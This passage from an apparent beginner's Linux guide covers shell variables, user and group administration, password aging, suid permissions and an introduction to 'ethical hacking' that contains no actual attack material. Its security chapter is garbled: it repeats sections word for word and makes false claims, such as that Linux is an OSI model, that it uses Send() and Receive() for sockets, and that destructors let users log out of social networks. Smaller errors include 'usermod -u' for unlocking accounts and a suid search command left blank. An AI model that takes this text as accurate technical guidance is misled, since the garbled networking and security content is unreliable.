Example: cat textx.txt >> testy.txt

Example: Using standard input with cat.


Command: cat < testy

Using head and tail commands


By default, the head command displays 10 lines from the top and tail
command displays the 10 lines from the bottom.
Examples:
- head testy
- tail testy
- head -2 testy
- tail -2 testy
Chapter 9 Variables
The echo command is used in printing out the values present inside the
variables. In Linux, creation of variables is very easy. For example, in order
to store a name, John into a variable name, you can do something similar to
what’s being shown below:
[root@archserver ~]# name="John"
The double quotation marks tell Linux that you are creating a variable which
will hold string typed value: John. If your string contains only one word then
you can ignore the quotation marks, but if you are storing a phrase that
contains more than one word and whitespaces than you must use the double
quotation marks. To see the value inside any variable, you have to use the
dollar sign ($) before mentioning the name of the variable in the echo
command. Like this:
[root@archserver ~]# echo $name
John
If you miss the dollar sign ($), echo will treat the argument passed to it as a
string and will print that string for example:
[root@archserver ~]# echo name
name
You should keep in mind that there should not be any white spaces present
between the identifier of the variable and its value. An identifier is basically
the name or signature of a variable:
[root@archserver ~]# x=5 # This syntax is correct because there aren’t any
whitespaces
[root@archserver ~]# x = 10 # This syntax is incorrect because whitespaces
are
#present between the variable name and its value
If you want to store some value inside a file whilst using the echo command,
you could do something like this:
[root@archserver NewFolder]# echo name > new.txt
[root@archserver NewFolder]# cat new.txt
name
In the example above, I am storing a string name into a file that I created.
After storing the text in the file, I printed it on the terminal and got exactly
what I stored in the text file. In the following set of commands, I am using
double >> signs to append new text in the existing file.
[root@archserver NewFolder]# echo "is something that people use to
recognize you!" >> new.txt
[root@archserver NewFolder]# cat new.txt
name
is something that people use to recognize you!
You can also create and print two variables with a single line of command
each, respectively.
Example:
[root@archserver ~]# x=1; y=2
[root@archserver ~]# echo -e "$x\t$y"
12
[root@archserver ~]# echo -e "$x\n$y"
1
2
The flag –e tells Linux that I am going to use an escape character whilst
printing the values of my variable. The first echo command in the example
above contains the \t escape character, which means that a tab of space should
be added whilst printing the values of variables passed. The second echo
command also contains an escape character of new line: \n. This escape
character will print a new line between the values of two variables, as it is
shown in the aforementioned example.
There are other escape sequences present in Linux terminal as well. For
example, in order to print a back slash as part of your string value, you must
use double back slash in your echo command:
[root@archserver ~]# echo -e "$x\\$y"
1\2
There are other variables present in the Linux too, there variables store some
values that come in handy whilst using any distribution of Linux. These
predefined variables are often referred to as global variables. For example,
$HOME is one of those global variable. The $HOME variable stores the path
of our default directory, which in our case is the HOME folder. We can see
the path stored in the $HOME folder using the echo command:
[root@archserver ~]# echo $HOME
/root
We can also change the values of these global variables, using the same
method that I used to store Value into a newly created variables. For now, I
would ask you not to try that, as these kind of things only concern expert
Linux users, which you are not right now, but soon you will be. Other global
variables are:

1. PATH
2. PS1
3. TMPDIR
4. EDITOR
5. DISPLAY
Try echoing there values, but don’t change them, as they will affect the
working of your Linux Installation:
[root@archserver ~]# echo $PS1
[\u@\h \W]\$
[root@archserver ~]# echo $EDITOR

[root@archserver ~]# echo $DISPLAY


:1
[root@archserver ~]# echo $TMPDIR
The most important global variable of all is the $PATH variable. The $PATH
variable contains the directories / locations of all the programs that you can
use from any directory. $PATH is similar to the environment variables
present in the WINDOWS operating system. Both hold the directory paths to
the programs. Let’s print the $PATH variable. Our outputs might differ so
don’t worry if you see something different:
Example:
[root@archserver ~]# echo $PATH
Output:
/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core
The output of the example above shows the path where Linux can find files
related to site_perl, vendor_perl or core_perl. You can add values to the path
variable too. But again, at this stage you shouldn’t change any value present
in the $PATH variable.
If you want to see where the commands that you use, reside in the directory
structure of Linux, you should use the which command. It will print out the
directory from where Linux is getting the definition of a command passed.
Example:
[root@archserver ~]# which ls
/usr/bin/ls

[root@archserver ~]# which pwd


/usr/bin/pwd

[root@archserver ~]# which cd


which: no cd in
(/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/cor

[root@archserver ~]# which mv


/usr/bin/mv
Chapter 10 User and Group Management
In this chapter, we will learn about users and groups in Linux and how to
manage them and administer password policies for these users. By the end of
this chapter, you will be well versed with the role of users and groups on a
Linux system and how they are interpreted by the operating system. You will
learn to create, modify, lock and delete user and group accounts, which have
been created locally. You will also learn how to manually lock accounts by
enforcing a password-aging policy in the shadow password file.
Users and Groups
In this section, we will understand what users and groups are and what is
their association with the operating system.
Who is a user?
Every process or a running program on the operating system runs as a user.
The ownership of every file lies with a user in the system. A user restricts
access to a file or a directory. Hence, if a process is running as a user, that
user will determine the files and directories the process will have access to.
You can know about the currently logged-in user using the id command. If
you pass another user as an argument to the id command, you can retrieve
basic information of that other user as well.
If you want to know the user associated with a file or a directory, you can
use the ls -l command and the third column in the output shows the
username.
You can also view information related to a process by using the ps
command. The default output to this command will show processes
running only in the current shell. If you use the ps a option in the
command, you will get to see all the process across the terminal. If you
wish to know the user associated with a command, you can pass the u
option with the ps command and the first column of the output will show
the user.
The outputs that we have discussed will show the users by their name, but the
system uses a user ID called UID to track the users internally. The usernames
are mapped to numbers using a database in the system. There is a flat file
stored at /etc/passwd, which stored the information of all users. There are
seven fields for every user in this file.
username: password:UID:GID:GECOS:/home/dir:shell
username:
Username is simply the pointing of a user ID UID to a name so that humans
can retain it better.
password:
This field is where passwords of users used to be saved in the past, but now
they are stored in a different file located at /etc/shadow
UID:
It is a user ID, which is numeric and used to identify a user by the system at
the most fundamental level
GID:
This is the primary group number of a user. We will discuss groups in a while
GECOS:
This is a field using arbitrary text, which usually is the full name of the user
/home/dir:
This is the location of the home directory of the user where the user has their
personal data and other configuration files
shell:
This is the program that runs after the user logs in. For a regular user, this
will mostly be the program that gives the user the command line prompt
What is a group?
Just like users, there are names and group ID GID numbers associated with a
group. Local group information can be found at /etc/group
There are two types of groups. Primary and supplementary. Let’s understand
the features of each one by one.
Primary Group:

There is exactly one primary group for every user


The primary group of local users is defined by the fourth field
in the /etc/passwd file where the group number GID is listed
New files created by the user are owned by the primary group
The primary group of a user by default has the same name as
that of the user. This is a User Private Group (UPG) and the
user is the only member of this group
Supplementary Group:

A user can be a member of zero or more supplementary groups


The primary group of local users is defined by the last field in
the /etc/group file. For local groups, the membership of the
user is identified by a comma separated list of user, which is
located in the last field of the group’s entry in /etc/group
groupname: password:GID:list, of, users, in, this, group
The concept of supplementary groups is in place so that users
can be part of more group and in turn have to resources and
services that belong to other groups in the system
Getting Superuser Access
In this section, we will learn about what the root user is and how you can be
the root or superuser and gain full access over the system.
The root user
There is one user in every operating system that is known as the super user
and has all access and rights on that system. In a Windows based operating
system, you may have heard about the superuser known as the
administrator. In Linux based operating systems, this superuser is known
as the root user. The root user has the power to override any normal
privileges on the file system and is generally used to administer and
manage the system. If you want to perform tasks such as installing new
software or removing an existing software, and other tasks such as manage
files and directories in the system, a user will have to escalate privileges to
the root user.
Most devices on an operating system can be controlled only by the root user,
but there are a few exceptions. A normal user gets to control removable
devices such as a USB drive. A non-root user can, therefore, manage and
remove files on a removable device but if you want to make modifications to
a fixed hard drive, that would only be possible for a root user.
But as we have heard, with great power comes great responsibility. Given the
unlimited powers that the root user has, those powers can be used to damage
the system as well. A root user can delete files and directories, remove or
modify user accounts, create backdoors in the system, etc. Someone else can
gain full control over the system if the root user account gets compromised.
Therefore, it is always advisable that you login as a normal user and escalate
privileges to the root user only when absolutely required.
The root account on Linux operating system is the equivalent of the local
Administrator account on Windows operating systems. It is a practice in
Linux to login as a regular user and then use tools to gain certain privileges of
the root account.
Using Su to Switch Users
You can switch to a different user account in Linux using the su
command. If you do not pass a username as an argument to the su
command, it is implied that you want to switch to the root user account. If
you are invoking the command as a regular user, you will be prompted to
enter the password of the account that you want to switch to. However, if
you invoke the command as a root user, you will not need to enter the
password of the account that you are switching to.
su - <username>
[student@desktop ~]$ su -
Passord: rootpassword
[root@desktop ~]#
If you use the command su username, it will start a session in a non-login
shell. But if you use the command as su - username, there will be a login
shell initiated for the user. This means that using su - username sets up a new
and clean login for the new user whereas just using su username will retain
all the current settings of the current shell. Mostly, to get the new user’s
default settings, administrators usually use the su - command.

sudo and the root


There is a very strict model implemented in linux operating systems for users.
The root user has the power to do everything while the other users can do
nothing that is related to the system. The common solution, which was
followed in the past was to allow the normal user to become the root user
using the su command for a temporary period until the required task was
completed. This, however, has the disadvantage that a regular user literally
would become the root user and gain all the powers of the root user. They
could then make critical changes to the system like restarting the system and
even delete an entire directory like /etc. Also, gaining access to become the
root user would involve another issue that every user switching to the root
user would need to know the password of the root user, which is not a very
good idea.
This is where the sudo command comes into the picture. The sudo
command lets a regular user run command as if they are the root user, or
another user, as per the settings defined in the /etc/sudoers file. While
other tools like su would require you to know the password of the root
user, the sudo command requires you to know only your own password for
authentication, and not the password of the account that you are trying to
gain access to. By doing this, it allows the administrator of the system to
allow a certain list of privileges to regular users such that they perform
system administration tasks, without actually needing to know the root
password.
Lets us see an example where the student user through sudo has been
granted access to run the usermod command. With this access, the student
user can now modify any other user account and lock that account
[student@desktop ~]$ sudo usermod -L username
[sudo] password for student: studentpassword
Another benefit of using the sudo access is that all commands that any
user runs using sudo are logged to /var/log/secure.
Managing User Accounts
In this section, you will learn how to create, modify, lock and delete user
accounts that are defined locally in the system. There are a lot of tools
available on the command line, which can be invoked to manage local user
accounts. Let us go through them one by one and understand what they do.
useradd username is a command that creates a new user with the
username that has been specified and creates default parameters for the
user in the /etc/passwd file when the command is run without using an
option. Although, the command will not set any default password for the
new user and therefore, the user will not be able to login until a password
has been set for them.
The useradd --help will give you a list of options that can be specified for
the useradd command and using these will override the default parameters
of the user in the /etc/passwd file. For a few options, you can also use the
usermod command to modify existing users.
There are certain parameters for the user, such as the password aging
policy or the range of the UID numbers, which will be read from the
/etc/login.defs file. The file only comes into picture while creating new
users. Modifying this file will not make any changes to existing users on
the system.
● usermod --help will display all the basic options that you can use with
this command, which can be used to manage user accounts. Let us go through
these in brief
-c, --comment This option is used to add a value such as full name
COMMENT to the GECOS field

-g, --gid GROUP The primary group of the user can be specified using
this option

-G, --groups Associate one or more supplementary groups with


GROUPS user

-a, --append The option is used with the -G option to add the user
to all specified supplementary groups without
removing the user from other groups

-d, --home The option allows you to modify a new home


HOME_DIR directory for the user

-m, --move-home You can move the location of the user’s home
directory to a new location by using the -d option

-s, --shell SHELL The login shell of the user is changed using this
option
-L, --lock Lock a user account using this option

-U, --unlock Unlock a user account using this option

● userdel username deletes the user from the /etc/passwd file but does not
delete the home directory of that user.
userdel -r username deletes the user from /etc/passwd and deletes their home
directory along with its content as well.
● id displays the user details of the current user, which includes the UID
of the user and group memberships.
id username will display the details of the user specified, which includes the
UID of the user and group memberships.
● passwd username is a command that can be used to set the user’s initial
password or modify the user’s existing password.
The root user has the power to set the password to any value. If the criteria
for password strength is not met, a warning message will appear, but the root
user can retype the same password and set the password for a given user
anyway.
If it is a regular user, they will need to select a password, which is at least 8
characters long, should not be the same as the username, or a previous word,
or a word that can be found in the dictionary.
● UID Ranges are ranges that are reserved for specific purposes in
Red Hat Enterprise Linux 7
UID 0 is always assigned to the root user.
UID 1-200 are assigned by the system to system processes in a static
manner.
UID 201-999 are assigned to the system process that does not own any file
in the system. They are dynamically assigned whenever an installed
software request for a process.
UID 1000+ are assigned to regular users of the system.
Managing Group Accounts
In this section, we will learn about how to create, modify, and delete group
accounts that have been created locally.
It is important that the group already exists before you can add users to a
group. There are many tools available on the Linux command line that will
help you to manage local groups. Let us go through these commands used for
groups one by one.
● groupadd groupname is a command that if used without any options
creates a new group and assigns the next available GID in the group range
and defines the group in the /etc/login.defs file
You can specify a GID by using the option -g GID
[student@desktop ~]$ sudo groupadd -g 5000 ateam
The -r option will create a group that is system specific and assign it a
GID belonging to the system range, which is defined in the /etc/login.defs
file.
[student@desktop ~]$ sudo groupadd -r professors
● groupmod command is used to modify the parameters of an existing
group such as changing the mapping of the groupname to the GID. The -n
option is used to specify a new name to the group.
[student@desktop ~]$ sudo groupmod -n professors lecturers
The -g option is passed along with the command if you want to assign a
new GID to the group.
[student@desktop ~]$ sudo groupmod -g 6000 ateam

● groupdel command is used to delete the group.


[student@desktop ~]$ sudo groupdel ateam
Using groupdel may not work on a group that is the primary group of a user.
Just like userdel, you need to be careful with groupdel that you check that
there are no files on the system owned by the user existing after deleting the
group.
● usermod command is used to modify the membership of a user to a
group. You can use the command usermod -g groupname to achieve the
same.
[student@desktop ~]$ sudo usermod -g student student
You can add a user to the supplementary group using the usermod -aG
groupname username command.
[student@desktop ~]$ sudo usermod -aG wheel student
Using the -a option ensures that modifications to the user are done in append
mode. If you do not use it, you will be removed from all other groups and be
only added to the new group.
User Password Management
In this section, we will learn about the shadow password file and how you
can use it to manually lock accounts or set password-aging policies to an
account. In the initial days of Linux development, the encrypted password for
a user was stored in the file at /etc/passwd, which was world-readable. This
was tested and found to be a secure path until attackers started using
dictionary attacks on encrypted passwords. It was then that it was decided to
move the location of encrypted password hash to a more secure location,
which is at /etc/shadow file. The latest implementation allows you to set
password-aging policies and expiration features using this new file.
The modern password hash has three pieces of information in it. Consider the
following password hash:
$1$gCLa2/Z$6Pu0EKAzfCjxjv2hoLOB/
1: This part specifies the hashing algorithm used. The number 1 indicates
that an MD5 hash has been implemented. The number 6 comes into the
hash when a SHA-512 hash is used.
gCLa2/Z: This indicates the salt used to encrypt the hash. It is a randomly
chosen salt at first. The combination of the unencrypted password and salt
together form the encrypted hash. The advantage of having a salt is that
two users who may be using the same password will not have identical
hash entries in the /etc/shadow file.
6Pu0EKAzfCjxjv2hoLOB/: This is the encrypted hash.
In the event of a user trying to log in to the system, the system looks up for
their entry in the /etc/shadow file. It then combines the unencrypted password
entered by the user with the salt for the user and uses the hash algorithm
specified to encrypt this combination. It is implied that the password typed by
the user is correct of this hash matches with the hash in the /etc/shadow file.
Otherwise, the user has just typed in the wrong password and their login
attempt fails. This method is secure as it allows the system to determine if a
user typed in the correct password without having to store the actual
unencrypted password in the file system.
The format of the /etc/shadow file is as below. There are 9 fields for every
user as follows.
name:password:lastchange:minage:maxage:warning: inactive: expire:
name: This needs to be a valid username on a particular system through
which a user logs in.
password: This is where the encrypted password of the user is stored. If the
field starts with an exclamation mark, it means that password is locked.
lastchange: This is the timestamp of the last password change done for the
account.
minage: This defines the minimum number of days before a password needs
to be changed. If it is the number 0, it means there is no minimum age for the
account.
maxage: This defines the maximum number of days before a password needs
to be changed.
warning: This is a warning period that shows that the password is going to
expire. If the number is 0, it means that no warning will be given before
password expiry.
inactive: This is the number of days after password expiry the account will
stay inactive. During this, the user can use the expired password and still log
into the system to change his password. If the user fails to do so in the
specified number of days for this field, the account will get locked and
become inactive.
expire: This is the date when the account is set to expire.
blank: This is a blank field, which is reserved for future use.
Password Aging
Password aging is a technique that is employed by system administrators to
safeguard bad passwords, which are set by users of an organization. The
policy will basically set a number of days, which is 90 days by default after,
which a user will be forced to change their password. The advantage of
forcing a password change implies that even if someone has gained access to
a user’s password, they will have it with them only for a limited amount of
time. The con to this approach is that users will keep writing their password
in some place since they can’t memorize it if they keep changing it.
In Red Hat Enterprise Linux 7, there are two ways through, which password
aging can be enforced.

1. Using the chage command on the command line


2. Using the User Management application in the graphical
interface
The chage command with the -M option lets a system admin specify the
number of days for, which the password is valid. Let us look at an
example.
[student@desktop ~]$ sudo chage -M 90 alice
In this command, the password validity for the user alice will be set to 90
days after, which the user will be forced to reset their password. If you want
to disable password aging, you can specify the -M value as 9999, which is
equivalent to 273 years.
You can set password aging policies by using the graphical user interface
as well. There is an application called User Manager, which you can
access from the Main Menu Button > System Settings > Users & Groups.
Alternatively, you can type the command system-config-users in the
terminal window. The User Manager window will pop up. Navigate to the
Users tab, select the required user from the list, and click on the Properties
button where you can set the password aging policy.
Access Restriction
You can set the expiry for an account using the chage command. The user
will not be allowed to login to the system once that date is reached. You
can use the usermod command with the -L option to lock a particular user
account.
[student@desktop ~]$ sudo usermod -L alice
[student@desktop ~]$ su - alice
Password: alice
su: Authentication failure
The usermod command is useful to lock and expire an account at the same
time in a case where the employee might have left the company.
[student@desktop ~]$ sudo usermod -L -e 1 alice
A user may not be able to authenticate into the system using a password
once their account has been locked. It is one of the best practices to
prevent authentication of an employee to the system who has already left
the organization. You can use the usermod -u username command later to
unlock the account, in the event that the employee has rejoined the
organization. While doing this, if the account was in an expired state, you
will need to ensure that you set a new expiry date for the account as well.
The nologin shell
There will be instances where you want to create a user who can authenticate
using a password and get a login into the system but would not need a shell to
interact with the system. For example, a mail server may require a user to
have an email account so that the user can login and check their emails. But it
is not necessary that the user needs a login to the system to check their
emails.
This is where the nologin shell comes as a solution. What we do is we
specify the shell for this user to point to /sbin/nologin. Once this is done,
the user cannot login to the system using the direct login procedure.

[root@desktop ~]# usermod - s /sbin/nologin student


[root@desktop ~]# su - student
Last login: Tue Mar 5 20:40:34 GMT 2015 on pts/0
The account is currently not available.
By using the nologin shell for the user, you are denying the user interactive
login into the system but not all access to the system. The user will still be
able to use certain web applications for file transfer applications to upload or
download files.
Chapter 11 Learning Linux Security Techniques
To help you gain better security, and make sure your OS would always be in
a “healthy” state, it’s best that you take note of the commands given below:
Cross Platforms
You could also do cross-platform programming for Linux. For this, you have
to keep the following in mind:
windows.h and winsock.h should be used as the header files.
Instead of close(), closesocket() has to be used.
Send () and Receive() are used, instead of read() or write().
WSAStartup() is used to initialize the library.
Internet Message Protocol
Host Resolutions
One thing you have to keep in mind about this is that you should use the
syntax gethostname() so the standard library could make the right call.
This also happens when you’re trying to look for the name of a certain part
of the program, and when you want to use it for larger applications. It’s
almost the same as python as you could code it this way
Linux Sockets
What you have to understand about Linux is that it is an Open System
Interconnect (OSI) Internet Model which means that it works in sockets ().
In order to establish connections, you need to make use of listening
sockets so that the host could make calls—or in other words, connections.
By inputting listen (), the user will be able to accept () blocks on the
program. This binds () the program together and makes it whole. For this,
you could keep the following in mind:
Server: socket()→bind()→listen()→accept()→read()→write()→ read()
Send Request: write()→ read()
Receive Reply: write()→ read()
Establish connections: connect→ accept()
Close Connection: close()→ read()
Client: socket()→connect→write()→read()→ close()
Understanding basic Linux security
Construct and Destruct
These are connected to the descriptor of the socket that allow peer TCP Ports
and peer IP Addresses to show up onscreen. Take note that this does not use
other languages, except for C++, unlike its contemporaries in Linux.
Destructors are then able to close any connections that you have made. For
example, if you want to log out of one of your social networking accounts,
you’re able to do it because destructors are around.
Linux and SMTP Clients
As for SMTP Client, you could expect that it involves some of the same
characters above—with just a few adjustments. You also should keep in mind
that this is all about opening the socket, opening input and output streams,
reading and writing the socket, and lastly, cleaning the client portal up. You
also have to know that it involves the following:
Datagram Communication. This means that local sockets would work
every time your portal sends datagrams to various clients and servers.
Linux Communications. This time, stream and datagram
communication are involved.
Programming Sockets. And of course, you can expect you’ll program
sockets in the right manner!
Echo Client Set-ups
In Linux, Echo Clients work by means of inserting arguments inside the
socket() because it means that you will be able to use the IP together with
the PF_INET function so that they could both go in the TCP socket. To set
up a proper client structure, just remember you have to make a couple of
adjustments from earlier codes.
Linux and its Sockets
You also have to understand that you can code Linux in C mainly because
they both involve the use of sockets. the socket works like a bridge that binds
the client to the port, and is also responsible for sending the right kinds of
requests to the server while waiting for it to respond. Finally, sending and
receiving of data is done.
At the same time, the Linux Socket is also able to create a socket for the
server that would then bind itself to the port. During that stage, you can begin
listening to client traffic as it builds up. You could also wait for the client at
that point, and finally, see the sending and receiving of data to happen. Its
other functions are the following:
socket_description. This allows the description of both the client and the
server will show up onscreen.
write buffer. This describes the data that needs to be sent.
write buffer length. In order to write the buffer length, you’ll have to see
the string’s output.
client_socket. The socket description will also show on top.
address. This is used for the connect function so that address_len would
be on top.
address_len. If the second parameter is null, this would appear onscreen.
return. This helps return description of both the client and the socket.
This also lets interaction become easy between the client and the server.
server_socket. This is the description of the socket that’s located on top.
backlog. This is the amount of requests that have not yet been dealt with.
You could also put personal comments every once in a while—but definitely
not all the time!
Understanding advanced Linux security
Internet Protocol is all about providing boundaries in the network, as well as
relaying datagrams that allow internet-networking to happen.
The construction involves a header and a payload where the header is
known to be the main IP Address, and with interfaces that are connected
with the help of certain parameters. Routing prefixes and network
designation are also involved, together with internal or external gateway
protocols, too. Reliability also depends on end-to-end protocols, but
mostly, you could expect the framework to be this way:
UDP Header | UDP DATA→ Transport
IP Header | IP Data→ Internet
Frame Header | Frame Data | Frame Footer→ Link
Data→ Application
Getting Peer Information
In order to get peer information, you have to make sure that you return
both TCP and IP information. This way, you could be sure that both server
and client are connected to the network. You could also use the
getpeername() socket so that when information is available, it could
easily be captured and saved. This provides the right data to be sent and
received by various methods involved in Linux, and also contains proper
socket descriptors and grants privileges to others in the program. Some
may even be deemed private, to make the experience better for the users.
To accept information, let the socket TCPAcceptor::accept() be
prevalent in the network. This way, you could differentiate actions coming
from the server and the client.
Construct and Destruct
These are connected to the descriptor of the socket that allow peer TCP Ports
and peer IP Addresses to show up onscreen. Take note that this does not use
other languages, except for C++, unlike its contemporaries in Linux.
Destructors are then able to close any connections that you have made. For
example, if you want to log out of one of your social networking accounts,
you’re able to do it because destructors are around.
All Linux distros come with a robust selection of applications that you can
use for almost all of your daily computing needs. Almost all of these
applications are easily accessible using your distro’s GUI desktop.
In this chapter, you will get to know some of the most common Linux
applications and learn how to access them whenever you want to. You will
also get to know some of the file managers used by different GUIs, which
will allow you to make changes or browse files in your computer.
Almost all applications used by Linux have dedicated websites in which you
can find detailed information about them, including details on where and how
to download them. At the same time, all distros come with different sets of
utilities and apps that you can choose to install as you setup your chosen
distro.
If you have a missing app in a Debian or Debian-based distro, such as
Ubuntu, you can easily get that application as long as you have a high-speed
internet connection.
Linux and SMTP Clients
As for SMTP Client, you could expect that it involves some of the same
characters above—with just a few adjustments. You also should keep in mind
that this is all about opening the socket, opening input and output streams,
reading and writing the socket, and lastly, cleaning the client portal up. You
also have to know that it involves the following:
Datagram Communication. This means that local sockets would work
every time your portal sends datagrams to various clients and servers.
Linux Communications. This time, stream and datagram
communication are involved.
Programming Sockets. And of course, you can expect you’ll program
sockets in the right manner!
Echo Client Set-ups
In Linux, Echo Clients work by means of inserting arguments inside the
socket() because it means that you will be able to use the IP together with
the PF_INET function so that they could both go in the TCP socket. To set
up a proper client structure, just remember you have to make a couple of
adjustments from earlier codes.
Linux and its Sockets
You also have to understand that you can code Linux in C mainly because
they both involve the use of sockets. the socket works like a bridge that binds
the client to the port, and is also responsible for sending the right kinds of
requests to the server while waiting for it to respond. Finally, sending and
receiving of data is done.
At the same time, the Linux Socket is also able to create a socket for the
server that would then bind itself to the port. During that stage, you can begin
listening to client traffic as it builds up. You could also wait for the client at
that point, and finally, see the sending and receiving of data to happen. Its
other functions are the following:
socket_description. This allows the description of both the client and the
server will show up onscreen.
write buffer. This describes the data that needs to be sent.
write buffer length. In order to write the buffer length, you’ll have to see
the string’s output.
client_socket. The socket description will also show on top.
address. This is used for the connect function so that address_len would
be on top.
address_len. If the second parameter is null, this would appear onscreen.
return. This helps return description of both the client and the socket.
This also lets interaction become easy between the client and the server.
server_socket. This is the description of the socket that’s located on top.
backlog. This is the amount of requests that have not yet been dealt with.
You could also put personal comments every once in a while—but definitely
not all the time!
Enhancing Linux security with selinux
Technically speaking, Linux is not an operating system per se, as are the
distros that are based on the Linux kernel. Linux supported by the larger,
Free/Libre/Open Source Software community, a.k.a. FLOSS. This is also
essential for security enhanced Linux (SElinux). Linux kernel version 4.0
released in 2015 is important in the integration of Selinux with the access
policies. The coding has increased in length exponentially since its
development.
Before you get started with programming on Linux, you need to have a clear
idea of what your goals are. If your goal is to make money, you can create
apps that are sold for a fee. If your goal is to contribute to the community,
you need to figure out what particular niche you can help fill. If you are
running a large business, you may want to hire a small army of tech
personnel to create patches and applications that will help to better run your
business’s software. A goal is not something that a book can give you; it is
something that you have to come up with yourself. What the rest of this book
will give you is some of the basic know-how that you will need to get started
with making those goals regarding Linux attainable.
There is a permission setting that can be seen as threatening to security,
which is called setuid or suid (set user ID). This permission setting applies to
files that you can run, or executable files. When the setuid/suid permission is
allowed, a file is executed under the owner’s user ID. In short, if the suid
permission is on and the file is owned by the root user, the targeted program
will view the root user to be the one running the file and not check on who
ran the program in reality. This also means that the permission for suid will
allow the program to do more functions than what the owner intends all the
other users to perform. It also helps to take note that if the said program that
contains the suid permission has some security vulnerabilities, criminal
hackers can create more havoc through these programs.
To find all enabled suid permissions, you can use the find command like
this:

After entering this command, you will see a list of files that appears like this
example:

Take note that there are numerous programs that are set with a suid
permission because they require it. However, you may want to check the
entire list to make sure that there are no programs that have odd suid
permissions. For example, you may not want to have suid programs located
in your home directory.
Here is an example: typing the ls –l /bin/su will give you the following
result:
The character s in the permission setting alluded to the owner (appears as –
rws) shows that the file /bin/su has suid permission. This means that the su
command, which allows any user to have superuser privileges, can be used
by anyone.
Chapter 12 Some Basic Hacking with Linux
Now that you have hopefully gotten used to the Linux system and have some
ideas of how it works and such, it is a good time to learn a little bit about
hacking with Linux. whether you are using this system on your own or you
have it set up with a network of other people, there are a few types of hacking
that you may find useful to know how to do. This chapter is going to spend
some time exploring some basic hacking endeavors on the Linux system.
We want to spend some time looking at how we can work with the Linux
system to help us complete some of the ethical hacking that we would like to
do. While we are able to do some hacking with the help of Windows and
Mac, often, the best operating system to help us out with all of this is going to
be the Linux operating system. It already works on the command line, which
makes things a bit easier and will have all of the protection that you need as
well. And so, we are going to spend a bit of our time taking a closer look at
how the Linux system is going to be able to help us out with some of the
hacking we want to accomplish.
There are a lot of reasons that hackers are going to enjoy working with Linux
over some of the other operating systems that are out there. The first benefit
is that it is open source. This means that the source code is right there and
available for you to use and modify without having to pay a lot of fees or
worry that it is going to get you into trouble. This open-source also allows
you to gain more access to it, share it with others and so much more. And all
of these can be beneficial to someone who is ready to get started with
hacking as well.
The compatibility that comes with Linux is going to be beneficial for a
hacker as well. This operating system is going to be unique in that it is going
to help us support all of the software packages of Unix and it is also able to
support all of the common file formats that are with it as well. This is
important when it comes to helping us to work with some of the hacking
codes that we want to do later on.
Linux is also designed to be fast and easy to install. There are a number of
steps that we had to go through in order to get started. But when compared to
some of the other operating systems this is not going to be that many and it
can really help you to get the most out of this in as little time as possible.
You will quickly notice that most of the distributions that you are able to do
with Linux are going to have installations that are meant to be easy on the
user. And also, a lot of the popular distributions of Linux are going to come
with tools that will make installing any of the additional software that you
want as easy and friendly as possible too. Another thing that you might notice
with this is that the boot time of the operating system of Linux is going to be
faster than what we see with options like Mac and Windows, which can be
nice if you do not want to wait around all of the time.
When you are working on some of the hacks that you would like to
accomplish, the stability of the program is going to matter quite a bit. You do
not want to work with a system that is not all that stable, or that is going to
fall apart on you in no time. Linux is not going to have to go through the
same periodic reboots like others in order to maintain the level of
performance that you would like and it is not going to slow down or freeze up
over time if there are issues with leaks in the memory and more. You are also
able to use this operating system for a long time to come, without having to
worry about it slowing down or running into some of the other issues that the
traditional operating systems will need to worry about.
For someone who is going to spend their time working with ethical hacking,
this is going to be really important as well. It will ensure that you are able to
work with an operating system that is not going to slow down and cause
issues with the protections that you put in place on it. And you will not have
to worry about all of the issues that can come up with it being vulnerable and
causing issues down the line as well. It is going to be safe and secure along
the way, so that you are able to complete your hacks and keep things safe,
without having to worry about things not always working out the way that we
would hope.
Another benefit that we will spend a bit of time on is how friendly the Linux
network is overall. As this operating system is an option that is open source
and is contributed by the team over the internet network, it is also able to
effectively manage the process of networking all of the time. And it is going
to help with things like commands that are easy to learn and lots of libraries
that can be used in a network penetration test if you choose to do this. Add on
that the Linux system is going to be more reliable and it is going to make the
backup of the network more reliable and faster and you can see why so many
users love to work with this option.
As a hacker, you will need to spend some of your time multitasking to get all
of the work done. A lot of the codes and more that you want to handle in
order to do a hack will need to have more than one thing going at a time, and
Linux is able to handle all of this without you having to worry about too
much going on or the computer freezing upon you all of the time.
In fact, the Linux system was designed in order to do a lot of things at the
same time. This means that if you are doing something large, like finishing
up a big printing job in the background, it is not really going to slow down
some of the other work that you are doing. Plus, when you need to handle
more than one process at the same time, it is going to be easier to do on
Linux, compared to Mac or Windows, which can be a dream for a hacker.
You may also notice that working with the Linux system is a bit different and
some of the interactions that you have to take care of are not going to be the
same as what we found in the other options. For example, the command-line
interface is going to introduce us to something new. Linux operating systems
are going to be specifically designed around a strong and highly integrated
command-line interface, something that the other two operating systems are
not going to have. The reason that this is important is that it will allow
hackers and other users of Linux to have more access and even more control,
over their system.
Next on the list is the fact that the Linux system is lighter and more portable
than we are going to find with some of the other operating systems out there.
This is a great thing because it is going to allow hackers with a method that
will make it easier to customize the live boot disks and drives from any
distribution of Linux that they would like. The installation is going to be fast
and it will not consume as many resources in the process. Linux is light-
weight and easy to use while consuming fewer resources overall.
The maintenance is going to be another important feature that we need to
look at when we are trying to do some ethical hacking and work with a good
operating system. Maintaining the Linux operating system is going to be easy
to work with. All of the software is installed in an easy manner that does not
take all that long and every variant of Linux has its own central software
repository, which makes it easier for the users to search for their software and
use the kind that they would like along the way.
There is also a lot of flexibility when it comes to working with this kind of
operating system. As a hacker, you are going to need to handle a lot of
different tools along the way. And one of the best ways that we are able to do
this is to work with an operating system that allows for some flexibility in the
work that we are doing. This is actually one of the most important features in
Linux because it allows us to work with embedded systems, desktop
applications and high-performance server applications as well.
As a hacker, you want to make sure that your costs are as low as possible. No
one wants to get into the world of ethical hacking and start messing with
some of those codes and processes and then find out that they have to spend
hundreds of dollars in order to get it all done. And this is where the Linux
system is going to come into play. As you can see from some of our earlier
discussions of this operating system, it is going to be an open-source
operating system, which means that we are able to download it free of cost.
This allows us to get started with some of the hacking that we want to do
without having to worry about the costs.
If you are working with ethical hacking, then your main goal is to make sure
that your computer and all of the personal information that you put into it is
going to stay safe and secure all of the time. This is going to be a command-
line to keep other hackers off and will make it so that you don’t have to
worry about your finances or other issues along the way, either. And this is
also where the Linux operating system is going to come into play to help us
out.
One of the nice things that we are going to notice when it comes to the Linux
